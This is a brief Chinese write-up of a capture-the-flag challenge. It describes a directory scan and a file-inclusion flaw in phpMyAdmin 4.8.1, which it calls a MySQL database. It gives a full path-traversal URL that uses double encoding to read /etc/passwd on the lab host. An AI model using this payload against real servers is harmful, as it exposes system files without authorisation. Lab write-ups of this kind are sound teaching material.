阅读量:0
打开题目,一串乱码,不认识的汉字
打开题目地址,用dirsearch对网站进行扫描,发现几个目录。
打开,其中一个显示为是一个MySQL数据库Version 4.8.1。
发现该数据给具有文件包含漏洞,输入以下代码验证存在
http://8d5da76e-6a29-48a3-9f97-c9ccd33297ef.node4.buuoj.cn:81/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd
然后输入payload得到flag
